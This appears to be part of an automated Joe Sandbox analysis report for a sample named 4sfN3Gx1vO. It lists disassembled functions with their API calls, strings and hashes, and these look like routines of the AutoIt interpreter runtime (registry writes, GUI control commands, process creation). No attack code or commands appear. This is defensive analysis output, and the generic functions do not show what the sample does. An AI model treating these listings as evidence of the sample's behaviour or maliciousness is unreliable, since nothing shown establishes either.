Instruction Fuzzy Hash: 20714B72A0020AEBDF20DFA5EC48BAEBFB8BF15310F148115F919A6191D7719A09DB60

Function 0059C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0059C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,005ACC08,00000000,?,00000000,?,?), ref: 0059C544
RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0059C5A4
_wcslen.LIBCMT ref: 0059C5F4
_wcslen.LIBCMT ref: 0059C66F
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0059C6B2
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0059C7C1
RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0059C84D
RegCloseKey.ADVAPI32(?), ref: 0059C881
RegCloseKey.ADVAPI32(00000000), ref: 0059C88E
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0059C960

Strings

REG_DWORD, xrefs: 0059C804
REG_EXPAND_SZ, xrefs: 0059C5CD
REG_BINARY, xrefs: 0059C913
REG_MULTI_SZ, xrefs: 0059C6F5
REG_QWORD, xrefs: 0059C8C3
REG_SZ, xrefs: 0059C644

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 6acd5b70e59bb7c068546cf1dc1efb49016b56b95f898f8e057102e442d035af
Instruction ID: 65d6091ea8e7ebefa0a227b30dc96ce80afb7bf4a83d511ccdbefd82c9d558a1
Opcode Fuzzy Hash: 6acd5b70e59bb7c068546cf1dc1efb49016b56b95f898f8e057102e442d035af
Instruction Fuzzy Hash: 891248356042029FDB14DF18C895A6ABFE5FF88714F05885DF85A9B3A2DB31ED81CB81

Function 005A091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 005A09C6
_wcslen.LIBCMT ref: 005A0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 005A0A54
_wcslen.LIBCMT ref: 005A0A8A
_wcslen.LIBCMT ref: 005A0B06
_wcslen.LIBCMT ref: 005A0B81

Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD

Part of subcall function 00572BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00572BFA

Strings

SELECT, xrefs: 005A0D11
GETSELECTED, xrefs: 005A0C4E
CHECK, xrefs: 005A0A85, 005A0AA0
EXISTS, xrefs: 005A0B7C, 005A0B97
GETTOTALCOUNT, xrefs: 005A09F2, 005A0A17
GETITEMCOUNT, xrefs: 005A0C1E
UNCHECK, xrefs: 005A0D3E
GETTEXT, xrefs: 005A0C97
EXPAND, xrefs: 005A0BF8
ISCHECKED, xrefs: 005A0CE1
COLLAPSE, xrefs: 005A0B01, 005A0B1C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 183a11114ebdba956d1e227a35ebcf89a2938ea692ca679c3ecc26221646e1a4
Instruction ID: 0b84ee3c1e562423bf36c7d2a3e3ff1fe8f90e3f4bb890a435a2b89ac42ce134
Opcode Fuzzy Hash: 183a11114ebdba956d1e227a35ebcf89a2938ea692ca679c3ecc26221646e1a4
Instruction Fuzzy Hash: 0EE17A312183069FC714DF28C45096EBBE2BF9A314F14895DF8969B3A2D731ED85CB91

Function 0059C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0059B6AE,?,?), ref: 0059C9B5
_wcslen.LIBCMT ref: 0059C9F1
_wcslen.LIBCMT ref: 0059CA68
_wcslen.LIBCMT ref: 0059CA9E
_wcslen.LIBCMT ref: 0059CAF9
_wcslen.LIBCMT ref: 0059CB2F
_wcslen.LIBCMT ref: 0059CB7F

Strings

HKU, xrefs: 0059CBF0
HKCR, xrefs: 0059CB29, 0059CB2E
HKEY_LOCAL_MACHINE, xrefs: 0059CA62, 0059CA67
HKLM, xrefs: 0059CA98, 0059CA9D
HKEY_CLASSES_ROOT, xrefs: 0059CAF3, 0059CAF8
HKCU, xrefs: 0059CBCE
HKEY_CURRENT_CONFIG, xrefs: 0059CB79, 0059CB7E
HKEY_CURRENT_USER, xrefs: 0059CBBD
HKEY_USERS, xrefs: 0059CBDF
HKCC, xrefs: 0059CBAC

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 127438a9f410792700a45c4835133499e74ab092614900d6fa17821f88732fa9
Instruction ID: eaf357bb85fa78da58079f1accf41328e4737ca79a2a4b9a844b8bb73652b882
Opcode Fuzzy Hash: 127438a9f410792700a45c4835133499e74ab092614900d6fa17821f88732fa9
Instruction Fuzzy Hash: 5D71E23260016B8BCF20DE7CC9515BE3FA2BFA5764F650529F8669B284E635CD84C7A0

Function 005A833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 005A835A
_wcslen.LIBCMT ref: 005A836E
_wcslen.LIBCMT ref: 005A8391
_wcslen.LIBCMT ref: 005A83B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005A83F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,005A5BF2), ref: 005A844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005A8487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005A84CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 005A8501
FreeLibrary.KERNEL32(?), ref: 005A850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 005A851D
DestroyIcon.USER32(?,?,?,?,?,005A5BF2), ref: 005A852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 005A8549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 005A8555

Strings

.exe, xrefs: 005A8388
.icl, xrefs: 005A8368
.dll, xrefs: 005A83AB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 8dcef1b7d0d98209c2095154804ca46b79036a4fbb0d84f637fee62daa3745be
Instruction ID: 4000e39377e1ed38495077e0679b0884a2ba5d4673d1438b79dc369000e5dc70
Opcode Fuzzy Hash: 8dcef1b7d0d98209c2095154804ca46b79036a4fbb0d84f637fee62daa3745be
Instruction Fuzzy Hash: 9F61E07190020ABFEB14DF64CC45BBE7FA8FB49721F10450AF815DA1D1EB74A980DBA0

Function 00517778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#include, xrefs: 00517847
#comments-end, xrefs: 005178D9
', xrefs: 00555169
#comments-start, xrefs: 0051785F, 005178B1
#include-once, xrefs: 0051782F
#ce, xrefs: 005178ED
", xrefs: 00555153
Bad directive syntax error, xrefs: 0055519A
#cs, xrefs: 00517873, 005178C5
#notrayicon, xrefs: 005177E7
#requireadmin, xrefs: 005177FF
Unterminated group of comments, xrefs: 0055528C
Cannot parse #include, xrefs: 00555279
#OnAutoItStartRegister, xrefs: 00517817
#pragma compile, xrefs: 005177D3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 534a70174e4acf6e41b15179eb500969b49225a8069b7566fe058f3d59f62035
Instruction ID: 8b0ea2b4074395fc69489bc7cb3bfefd18196bf34bccab275f2d21d2cdcfb67c
Opcode Fuzzy Hash: 534a70174e4acf6e41b15179eb500969b49225a8069b7566fe058f3d59f62035
Instruction Fuzzy Hash: 5B81E67160460ABBEB20AF64DC56FEE3F78FF59300F044025F905AA192EB70D985D7A1

Function 00575A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00575A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00575A40
SetWindowTextW.USER32(?,?), ref: 00575A57
GetDlgItem.USER32(?,000003EA), ref: 00575A6C
SetWindowTextW.USER32(00000000,?), ref: 00575A72
GetDlgItem.USER32(?,000003E9), ref: 00575A82
SetWindowTextW.USER32(00000000,?), ref: 00575A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00575AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00575AC3
GetWindowRect.USER32(?,?), ref: 00575ACC
_wcslen.LIBCMT ref: 00575B33
SetWindowTextW.USER32(?,?), ref: 00575B6F
GetDesktopWindow.USER32 ref: 00575B75
GetWindowRect.USER32(00000000), ref: 00575B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00575BD3
GetClientRect.USER32(?,?), ref: 00575BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00575C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00575C2F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 30612cc84018b78f48cf7f01230e89490f7eba844d435360fa553fc67054d6f2
Instruction ID: f717d6a50677cd11ac83ddbc175e8d267dfc15700b27c56e0b97a4f71b2ac2ed
Opcode Fuzzy Hash: 30612cc84018b78f48cf7f01230e89490f7eba844d435360fa553fc67054d6f2
Instruction Fuzzy Hash: B0717F31900B059FDB20DFA8DE85A6EBFF5FF48705F104918E18AA35A0E7B4E944DB50

Function 005730F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0057318D
_wcslen.LIBCMT ref: 005731F8

Strings

INSTANCE, xrefs: 00573453
CLASSNN, xrefs: 005731F3, 00573204
NAME, xrefs: 00573335, 00573346
[], xrefs: 0057339A
CLASS, xrefs: 00573188, 005731A5
REGEXPCLASS, xrefs: 00573255, 00573266
TEXT, xrefs: 0057347C

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[]
API String ID: 176396367-4125391415
Opcode ID: c85ac22828e6aa4ecbafa830eb0d43ad4ccbc1c81dd54fbe0dc067889a816da8
Instruction ID: 4fce7546877220f89ca9fbb137fdb8872f5243ea5fc453e8c3f1c017bfd1431e
Opcode Fuzzy Hash: c85ac22828e6aa4ecbafa830eb0d43ad4ccbc1c81dd54fbe0dc067889a816da8
Instruction Fuzzy Hash: FCE1E732A00516ABCF28DF78D4556EDBFB1BF44720F54C52AE45AA7240EB30AE85F790

Function 005300C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005300C6

Part of subcall function 005300ED: InitializeCriticalSectionAndSpinCount.KERNEL32(005E070C,00000FA0,5FA4A451,?,?,?,?,005523B3,000000FF), ref: 0053011C
Part of subcall function 005300ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005523B3,000000FF), ref: 00530127
Part of subcall function 005300ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005523B3,000000FF), ref: 00530138
Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0053014E
Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0053015C
Part of subcall function 005300ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0053016A
Part of subcall function 005300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00530195
Part of subcall function 005300ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005301A0

___scrt_fastfail.LIBCMT ref: 005300E7

Part of subcall function 005300A3: __onexit.LIBCMT ref: 005300A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00530122
kernel32.dll, xrefs: 00530133
InitializeConditionVariable, xrefs: 00530148
SleepConditionVariableCS, xrefs: 00530154
WakeAllConditionVariable, xrefs: 00530162

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 7b9d8a64aef4c36090ce989931249560b62d120c9820ec9e071151759eed3783
Instruction ID: 2b027beda6b6cd48bbc23366fbf28800fc68745221f96054de72aafd0fca023f
Opcode Fuzzy Hash: 7b9d8a64aef4c36090ce989931249560b62d120c9820ec9e071151759eed3783
Instruction Fuzzy Hash: 63212632A407116BE7256BA4BC59B2E7FE8FB56B61F00113AF801E72D1DBB09C04DB90

Function 005844C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,005ACC08), ref: 00584527
_wcslen.LIBCMT ref: 0058453B
_wcslen.LIBCMT ref: 00584599
_wcslen.LIBCMT ref: 005845F4
_wcslen.LIBCMT ref: 0058463F
_wcslen.LIBCMT ref: 005846A7

Part of subcall function 0052F9F2: _wcslen.LIBCMT ref: 0052F9FD

GetDriveTypeW.KERNEL32(?,005D6BF0,00000061), ref: 00584743

Strings

network, xrefs: 0058469D, 005846A2
removable, xrefs: 005845EA, 005845EF
all, xrefs: 00584531, 00584536
ramdisk, xrefs: 005846F1
cdrom, xrefs: 0058458F, 00584594
fixed, xrefs: 00584635, 0058463A
unknown, xrefs: 00584708

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: 045060e17fed9ee865c530bf999c969e4fb017f404a13b153530e7888972d2fe
Instruction ID: 52e427e6f0860e730395d9f9e12390ecf223d89397b3e5b1e8fc89aba3b4b925
Opcode Fuzzy Hash: 045060e17fed9ee865c530bf999c969e4fb017f404a13b153530e7888972d2fe
Instruction Fuzzy Hash: F2B19D316083039BC710EF28C894A6EBBE5BFA5764F50491DF896E7291E730D985CB92

Function 005A911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00529BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00529BB2

DragQueryPoint.SHELL32(?,?), ref: 005A9147

Part of subcall function 005A7674: ClientToScreen.USER32(?,?), ref: 005A769A
Part of subcall function 005A7674: GetWindowRect.USER32(?,?), ref: 005A7710
Part of subcall function 005A7674: PtInRect.USER32(?,?,005A8B89), ref: 005A7720

SendMessageW.USER32(?,000000B0,?,?), ref: 005A91B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005A91BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005A91DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 005A9225
SendMessageW.USER32(?,000000B0,?,?), ref: 005A923E
SendMessageW.USER32(?,000000B1,?,?), ref: 005A9255
SendMessageW.USER32(?,000000B1,?,?), ref: 005A9277
DragFinish.SHELL32(?), ref: 005A927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 005A9371

Strings

@GUI_DRAGFILE, xrefs: 005A9320
p#^, xrefs: 005A92BB
@GUI_DRAGID, xrefs: 005A92E9
@GUI_DROPID, xrefs: 005A929E

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#^
API String ID: 221274066-4237971630
Opcode ID: 5f30679c007cdd16b1e8693ff721ccc44b44fe8e2f45fe8d13d713b40d4e05dc
Instruction ID: b3122728a10f91d5f26426d0b86c766d0ab4d7bea99136e93a8158366580abd7
Opcode Fuzzy Hash: 5f30679c007cdd16b1e8693ff721ccc44b44fe8e2f45fe8d13d713b40d4e05dc
Instruction Fuzzy Hash: 3F613771108302AFD701DF54D889DAFBFE8FFD9750F00091AB595962A1DB309A49CB92

Function 0059AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0059B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0059B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0059B1D4
_wcslen.LIBCMT ref: 0059B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0059B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0059B236
_wcslen.LIBCMT ref: 0059B332

Part of subcall function 005805A7: GetStdHandle.KERNEL32(000000F6), ref: 005805C6

_wcslen.LIBCMT ref: 0059B34B
_wcslen.LIBCMT ref: 0059B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0059B3B6
GetLastError.KERNEL32(00000000), ref: 0059B407
CloseHandle.KERNEL32(?), ref: 0059B439
CloseHandle.KERNEL32(00000000), ref: 0059B44A
CloseHandle.KERNEL32(00000000), ref: 0059B45C
CloseHandle.KERNEL32(00000000), ref: 0059B46E
CloseHandle.KERNEL32(?), ref: 0059B4E3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 43a43014b1f580ad8b960684a5f6ab0ab09a79e9713ab0665f4e669329167644
Instruction ID: 22fa9e0d10ca38dedbe654ad8102f7799fe74ffb57dea26696b9a8f2fa066a33
Opcode Fuzzy Hash: 43a43014b1f580ad8b960684a5f6ab0ab09a79e9713ab0665f4e669329167644
Instruction Fuzzy Hash: 20F189316043019FEB14EF24D999B6ABFE5BF85310F14895DF8899B2A2DB31EC44CB52

Function 0051326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(005E1990), ref: 00552F8D
GetMenuItemCount.USER32(005E1990), ref: 0055303D
GetCursorPos.USER32(?), ref: 00553081
SetForegroundWindow.USER32(00000000), ref: 0055308A
TrackPopupMenuEx.USER32(005E1990,00000000,?,00000000,00000000,00000000), ref: 0055309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005530A9

Strings

0, xrefs: 0051327D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 0bf0b179e99ad1848a27375bce4e52cc18e0209f0940dc1bb431f9664887faae
Instruction ID: af02a0ea856ff7407d1511b743f0a84c1853f589062e0e377b662b911064c1d2
Opcode Fuzzy Hash: 0bf0b179e99ad1848a27375bce4e52cc18e0209f0940dc1bb431f9664887faae
Instruction Fuzzy Hash: 59710C30640206BEFB259F64DC99FAABF68FF06364F204216F9256A1E0C7B1AD54D750

Function 005A6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 005A6DEB

Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 005A6E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 005A6E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A6E94
DestroyWindow.USER32(?), ref: 005A6EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00510000,00000000), ref: 005A6EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005A6EFD
GetDesktopWindow.USER32 ref: 005A6F16
GetWindowRect.USER32(00000000), ref: 005A6F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 005A6F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 005A6F4D

